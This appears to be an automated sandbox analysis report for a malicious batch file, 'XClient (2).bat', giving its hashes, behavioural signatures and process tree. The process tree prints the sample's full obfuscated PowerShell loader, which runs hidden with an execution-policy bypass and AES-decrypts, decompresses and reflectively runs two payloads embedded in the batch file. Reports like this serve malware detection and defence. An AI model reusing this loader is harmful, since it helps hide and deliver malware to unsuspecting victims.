Analysis
-
max time kernel
117s -
max time network
117s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
08/11/2024, 00:02
Static task
static1
Behavioral task
behavioral1
Sample
XClient (2).bat
Resource
win7-20240903-en
6 signatures
150 seconds
General
-
Target
XClient (2).bat
-
Size
278KB
-
MD5
87dfdc436f01e7015c743698464c3b8f
-
SHA1
da351d18f1495a92396cfc1c7252e1b145b9adb2
-
SHA256
e87acd0cba7115834705368c2f03b629261bbc80519dc5e65c4395f992b129bc
-
SHA512
751bec2933262568a60c32c3781083b1a087e9f750a2e70b74a376c0cb449a674422398b56314ed8059a92a1a8f92b881fcfd88f68a6f753fd82b18bdde5d499
-
SSDEEP
6144:KnqZeu/Xeq5Bg0g/4ZL01PA84vRlzzQbVZnPM:cKeIlgLzy8AdKVZPM
Score
8/10
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2516 powershell.exe -
Deletes itself 1 IoCs
pid Process 2032 cmd.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2516 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2516 powershell.exe -
Suspicious use of WriteProcessMemory 9 IoCs
description pid Process procid_target PID 2032 wrote to memory of 2084 2032 cmd.exe 31 PID 2032 wrote to memory of 2084 2032 cmd.exe 31 PID 2032 wrote to memory of 2084 2032 cmd.exe 31 PID 2084 wrote to memory of 1680 2084 net.exe 32 PID 2084 wrote to memory of 1680 2084 net.exe 32 PID 2084 wrote to memory of 1680 2084 net.exe 32 PID 2032 wrote to memory of 2516 2032 cmd.exe 33 PID 2032 wrote to memory of 2516 2032 cmd.exe 33 PID 2032 wrote to memory of 2516 2032 cmd.exe 33
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\XClient (2).bat"1⤵
- Deletes itself
- Suspicious use of WriteProcessMemory
PID:2032 -
C:\Windows\system32\net.exenet file2⤵
- Suspicious use of WriteProcessMemory
PID:2084 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 file3⤵PID:1680
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NFENJiNpg1h6SHOQTfTGTD/pq4odY17xKRKy73LvL3s='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('q/sPA+mDcRRjW9KDIkqcPw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $fARel=New-Object System.IO.MemoryStream(,$param_var); $qyAQz=New-Object System.IO.MemoryStream; $UsAXh=New-Object System.IO.Compression.GZipStream($fARel, [IO.Compression.CompressionMode]::Decompress); $UsAXh.CopyTo($qyAQz); $UsAXh.Dispose(); $fARel.Dispose(); $qyAQz.Dispose(); $qyAQz.ToArray();}function execute_function($param_var,$param2_var){ $Ypvdz=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ivVjP=$Ypvdz.EntryPoint; $ivVjP.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\XClient (2).bat';$wKWxC=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\XClient (2).bat').Split([Environment]::NewLine);foreach ($whcSy in $wKWxC) { if ($whcSy.StartsWith(':: ')) { $smtAH=$whcSy.Substring(3); break; }}$payloads_var=[string[]]$smtAH.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2516
-